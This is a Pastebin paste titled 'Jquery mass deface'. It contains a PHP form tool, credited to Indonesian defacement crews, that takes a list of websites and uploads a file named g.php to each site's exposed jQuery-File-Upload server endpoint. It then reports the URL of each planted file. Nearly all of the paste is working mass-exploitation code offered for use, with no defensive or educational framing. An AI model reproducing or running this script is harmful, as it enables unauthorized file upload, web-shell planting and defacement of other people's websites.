Advertisement
blackcode7

Jquery mass deface

Feb 4th, 2016
291
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.51 KB | None | 0 0
  1. <html>
  2. <title>Jquery Mass Exploiter</title>
  3.             <font size=4>Jquery Mass Exploiter</font><br><br>
  4. <tr><td><form method="post" action="" enctype="multipart/form-data"></td></tr>
  5. <tr><td align="right" style="width:5%;"><textarea placeholder="http://res7ockcrew.org" style="padding: 5px; resize: none; width: 500px; height: 250px; border: solid 1px #006400;" name="sites"></textarea><td><tr><br>
  6. <tr><td><input style="width:37.1%;height:30px;" name="maju" type="submit" value="Exploit!"></td></tr>
  7. </form>
  8. <?php
  9. // Original code by Agus Setya R
  10. // Recoded by ./Bl4ckcod37
  11. // Thanks Allah SWT | Indoxploit | RES7OCK CREW | Indonesian People
  12. error_reporting(0);
  13. $site = explode("\r\n", $_POST['sites']);
  14. $maju = $_POST['maju'];
  15. if($maju) {
  16. foreach($site as $sites) {
  17. $uploadfile = "g.php";
  18. $ch = curl_init("{$sites}/assets/global/plugins/jquery-file-upload/server/php/");
  19. curl_setopt($ch, CURLOPT_POST, 1);
  20. curl_setopt($ch, CURLOPT_POSTFIELDS,
  21. array('files[]'=>"@$uploadfile"));
  22. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  23. $postResult = curl_exec($ch);
  24. curl_close($ch);
  25. if(preg_match("/url|deleteUrl|deleteType/", $postResult)) {
  26. preg_match('/"url":"(.*?)"/', $postResult, $get);
  27. $loc = $get[1];
  28. echo "URL : <font color=green>$sites</font><br>";
  29. echo "Status : <font color=green>Success ...</font><br>";
  30. echo "File : <a href='$loc' target='_blank'><font color=green>$loc</font></a><br>";
  31. }
  32. else{
  33. echo "URL : <font color=green>$sites</font><br>";
  34. echo "Status : <font color=red>Failed ...</font?";}
  35. }
  36. }
  37. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement